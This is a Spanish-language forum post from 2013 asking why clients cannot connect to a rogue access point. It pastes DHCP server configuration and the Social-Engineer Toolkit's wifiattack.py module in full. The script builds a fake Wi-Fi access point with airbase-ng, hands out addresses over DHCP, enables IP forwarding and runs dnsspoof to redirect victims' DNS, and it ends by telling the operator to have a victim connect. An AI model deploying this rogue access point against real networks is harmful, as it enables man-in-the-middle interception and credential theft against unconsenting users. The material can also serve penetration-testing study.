Título: SET - Wireless Access Point Attack Vector
Publicado por: Cr4id3r en 18 Abril 2013, 22:50 pm
Hola, buenas a todos chicos. Verán, tengo un pequeño problemilla creando mi AP: la cosa es que inicio el servicio correctamente y puedo ver perfectamente la red, pero a la hora de conectarme con un equipo, este se queda intentando establecer la conexión y de ahí no pasa. Estas son las configuraciones que tengo: dhcpd.conf# # Sample configuration file for ISC dhcpd for Debian # #
# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;
# option definitions common to all supported networks...
# NOTE(review): these two global options are still the Debian sample defaults;
# the subnet block further down sets its own domain-name and
# domain-name-servers, and in dhcpd the narrower scope wins for its clients.
option domain-name "example.org";
option domain-name-servers ns1.example.org, ns2.example.org;
default-lease-time 600;
max-lease-time 7200;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;
# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.
# NOTE(review): the comment above is left over from the sample file's empty
# subnet; this declaration does hand out leases, since it carries a range.
subnet 192.168.1.0 netmask 255.255.255.0 {
  option domain-name "mylan";
  option domain-name-servers 192.168.1.1;
  option routers 192.168.1.1;
  option subnet-mask 255.255.255.0;
  range 192.168.1.100 192.168.1.200;
}
# This is a very basic subnet declaration.
#subnet 10.254.239.0 netmask 255.255.255.224 { # range 10.254.239.10 10.254.239.20; # option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org; #}
# This declaration allows BOOTP clients to get dynamic addresses, # which we don't really recommend.
#subnet 10.254.239.32 netmask 255.255.255.224 { # range dynamic-bootp 10.254.239.40 10.254.239.60; # option broadcast-address 10.254.239.31; # option routers rtr-239-32-1.example.org; #}
# A slightly different configuration for an internal subnet. #subnet 10.5.5.0 netmask 255.255.255.224 { # range 10.5.5.26 10.5.5.30; # option domain-name-servers ns1.internal.example.org; # option domain-name "internal.example.org"; # option routers 10.5.5.1; # option broadcast-address 10.5.5.31; # default-lease-time 600; # max-lease-time 7200; #}
# Hosts which require special configuration options can be listed in # host statements. If no address is specified, the address will be # allocated dynamically (if possible), but the host-specific information # will still come from the host declaration.
#host passacaglia { # hardware ethernet 0:0:c0:5d:bd:95; # filename "vmunix.passacaglia"; # server-name "toccata.fugue.com"; #}
# Fixed IP addresses can also be specified for hosts. These addresses # should not also be listed as being available for dynamic assignment. # Hosts for which fixed IP addresses have been specified can boot using # BOOTP or DHCP. Hosts for which no fixed address is specified can only # be booted with DHCP, unless there is an address range on the subnet # to which a BOOTP client is connected which has the dynamic-bootp flag # set. #host fantasia { # hardware ethernet 08:00:07:26:c0:a5; # fixed-address fantasia.fugue.com; #}
# You can declare a class of clients and then do address allocation # based on that. The example below shows a case where all clients # in a certain class get addresses on the 10.17.224/24 subnet, and all # other clients get addresses on the 10.0.29/24 subnet.
#class "foo" { # match if substring (option vendor-class-identifier, 0, 4) = "SUNW"; #}
#shared-network 224-29 { # subnet 10.17.224.0 netmask 255.255.255.0 { # option routers rtr-224.example.org; # } # subnet 10.0.29.0 netmask 255.255.255.0 { # option routers rtr-29.example.org; # } # pool { # allow members of "foo"; # range 10.17.224.10 10.17.224.250; # } # pool { # deny members of "foo"; # range 10.0.29.10 10.0.29.230; # } #}
isc-dhcp-server# Defaults for isc-dhcp-server initscript # sourced by /etc/init.d/isc-dhcp-server # installed at /etc/default/isc-dhcp-server by the maintainer scripts
# # This is a POSIX shell fragment #
# Path to dhcpd's config file (default: /etc/dhcp/dhcpd.conf). #DHCPD_CONF=/etc/dhcp/dhcpd.conf
# Path to dhcpd's PID file (default: /var/run/dhcpd.pid). #DHCPD_PID=/var/run/dhcpd.pid
# Additional options to start dhcpd with. # Don't use options -cf or -pf here; use DHCPD_CONF/ DHCPD_PID instead #OPTIONS=""
# On what interfaces should the DHCP server (dhcpd) serve DHCP requests?
# Separate multiple interfaces with spaces, e.g. "eth0 eth1".
# This value is read by /etc/init.d/isc-dhcp-server (which sources this file)
# and restricts the interfaces dhcpd listens on.
INTERFACES="wlan0 mon0"
wifiattack.py#!/usr/bin/env python ############################################## # # This is a basic setup for an access point # attack vector in set. # ##############################################
import sys import os import subprocess import re import pexpect import time from src.core.setcore import * from src.core.menu import text from config.set_config import AIRBASE_NG_PATH as airbase_path from config.set_config import ACCESS_POINT_SSID as access_point from config.set_config import AP_CHANNEL as ap_channel from config.set_config import DNSSPOOF_PATH as dnsspoof_path
# Sanity-check the external tools this attack vector depends on.
# dnsspoof is mandatory: leave SET if the configured path does not exist.
dnsspoof_present = os.path.isfile(dnsspoof_path)
if not dnsspoof_present:
    print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
    exit_set()

# airbase-ng is optional: when the configured binary is missing, fall back to
# the copy bundled with SET. This rebinds the module-level name that the
# airbase-ng spawn further down reads.
airbase_present = os.path.isfile(airbase_path)
if not airbase_present:
    airbase_path = "src/wireless/airbase-ng"
    print_info("using SET's local airbase-ng binary")
# Walk the operator through editing the system dhcpd configuration so the
# DHCP daemon knows about the access point interface (at0), then block until
# the editor exits.
print_info("For this attack to work properly, we must edit the dhcp3-server file to include our wireless interface.")
print_info('This will allow dhcp3 to properly assign IPs. (INTERFACES="at0")')
print("")
for message in (
    "SET will now launch nano to edit the file.",
    "Press ^X to exit nano and don't forget to save the updated file!",
):
    print_status(message)
print_warning("If you receive an empty file in nano, please check the path of your dhcp3-server file!")
return_continue()
# subprocess.call() is Popen(...).wait(): returns once nano has been closed.
subprocess.call("nano /etc/dhcp/dhcpd.conf", shell=True)
# DHCP SERVER CONFIG HERE dhcp_config1 = (""" ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option domain-name-servers 8.8.8.8; option routers 10.0.0.1; option broadcast-address 10.0.0.255; default-lease-time 600; max-lease-time 7200; } """)
dhcp_config2 = (""" ddns-update-style none; authoritative; log-facility local7; subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.100 192.168.1.254; option domain-name-servers 8.8.8.8; option routers 192.168.1.1; option broadcast-address 192.168.1.255; default-lease-time 600; max-lease-time 7200; } """)
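# Menu: let the operator pick which of the two dhcpd configurations to use.
show_fakeap_dhcp_menu = create_menu(text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = raw_input(setprompt(["8"], ""))

if fakeap_dhcp_menu_choice != "":
    # check_length() comes from setcore; presumably it validates the answer
    # against the given maximum length (2) and returns the value to use.
    fakeap_dhcp_menu_choice = check_length(fakeap_dhcp_menu_choice, 2)
    # convert it to a string
    fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)

# an empty answer selects the first option
if fakeap_dhcp_menu_choice == "":
    fakeap_dhcp_menu_choice = "1"

if fakeap_dhcp_menu_choice == "exit":
    exit_set()

# Map each accepted choice onto the configuration text to write and the value
# of dhcptun, which the interface setup further down keys on.
_dhcp_choices = {
    "1": (dhcp_config1, 1),
    "2": (dhcp_config2, 2),
}
if fakeap_dhcp_menu_choice in _dhcp_choices:
    dhcp_config, dhcptun = _dhcp_choices[fakeap_dhcp_menu_choice]
    # writes the dhcp server out
    print_status("Writing the dhcp configuration file to src/program_junk")
    # open() instead of the Python-2-only file() builtin; the with-block closes
    # the handle even if write() raises.
    with open("src/program_junk/dhcp.conf", "w") as filewrite:
        filewrite.write(dhcp_config)
else:
    # An unrecognised answer used to fall through with dhcptun unbound, which
    # only surfaced later as a NameError when the interface was configured.
    print_warning("Unrecognized menu choice. Exiting....")
    exit_set()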
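interface = raw_input(setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))

# The interface name is spliced into a shell pipeline below and this script
# runs as root, so it must not be able to carry shell metacharacters. Linux
# interface names are at most 15 characters of letters, digits and a few
# punctuation characters; reject anything else instead of running it.
if not re.match(r"^[A-Za-z0-9_.:-]{1,15}$", interface):
    print_warning("Invalid wireless interface name. Exiting....")
    exit_set()

# place wifi interface into monitor mode
print_status("Placing card in monitor mode via airmon-ng..")

# if we have it already installed then don't use the SET one
if os.path.isfile("/usr/local/sbin/airmon-ng"):
    airmonng_path = "/usr/local/sbin/airmon-ng"
else:
    airmonng_path = "src/wireless/airmon-ng"

# Run airmon-ng and pull the monitor interface name out of its output: the
# fifth space-separated field of the "monitor mode enabled on ..." line, with
# the trailing ')' stripped. The pipeline is unchanged, but it now only ever
# receives a validated interface name.
monproc = subprocess.Popen(
    "%s start %s | grep \"monitor mode enabled on\" | cut -d\" \" -f5 | sed -e 's/)$//'" % (airmonng_path, interface),
    shell=True,
    stdout=subprocess.PIPE,
)
# communicate() drains stdout and waits for exit in one step; the value keeps
# the trailing newline exactly as stdout.read() did.
moniface = monproc.communicate()[0]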
# execute modprobe tun
# Load the tun module first; presumably needed for the at0 interface that is
# configured once airbase-ng is running.
subprocess.call("modprobe tun", shell=True)

# create a fake access point
print_status("Spawning airbase-ng in a seperate child thread...")
airbase_command = '%s -P -C 20 -e "%s" -c %s %s' % (
    airbase_path,
    access_point,
    ap_channel,
    moniface,
)
child = pexpect.spawn(airbase_command)
# Fixed delay rather than waiting on airbase-ng's output.
print_info("Sleeping 15 seconds waiting for airbase-ng to complete...")
time.sleep(15)
# bring the interface up
# Address at0 according to which dhcpd configuration was written: choice 1 is
# the 10.0.0.0/24 network, choice 2 is 192.168.1.0/24. at0 takes the .1
# address that the matching DHCP config advertises as the default router.
_ap_networks = {
    1: ("10.0.0.1", "10.0.0.0"),
    2: ("192.168.1.1", "192.168.1.0"),
}
if dhcptun in _ap_networks:
    gateway_addr, network_addr = _ap_networks[dhcptun]
    print_status("Bringing up the access point interface...")
    for command in (
        "ifconfig at0 up",
        "ifconfig at0 %s netmask 255.255.255.0" % gateway_addr,
        "ifconfig at0 mtu 1400",
        "route add -net %s netmask 255.255.255.0 gw %s" % (network_addr, gateway_addr),
    ):
        subprocess.call(command, shell=True)
# starts a dhcp server
# Each service below is spawned through pexpect and the handle is kept in a
# module-level name. None of them is waited on or inspected here, so a start-up
# failure would not be reported by this script — NOTE(review): confirm against
# the menu that stops the services later.
print_status("Starting the DHCP server on a seperate child thread...")
child2 = pexpect.spawn("/etc/init.d/isc-dhcp-server -cf src/program_junk/dhcp.conf at0")

# starts ip_forwarding
print_status("Starting IP Forwarding...")
child3 = pexpect.spawn("echo 1 > /proc/sys/net/ipv4/ip_forward")

# start dnsspoof
print_status("Starting DNSSpoof in a seperate child thread...")
child4 = pexpect.spawn("%s -i at0" % (dnsspoof_path))

print_status("SET has finished creating the attack. If you experienced issues please report them.")
print_status("Now launch SET attack vectors within the menus and have a victim connect via wireless.")
print_status("Be sure to come back to this menu to stop the services once your finished.")
return_continue()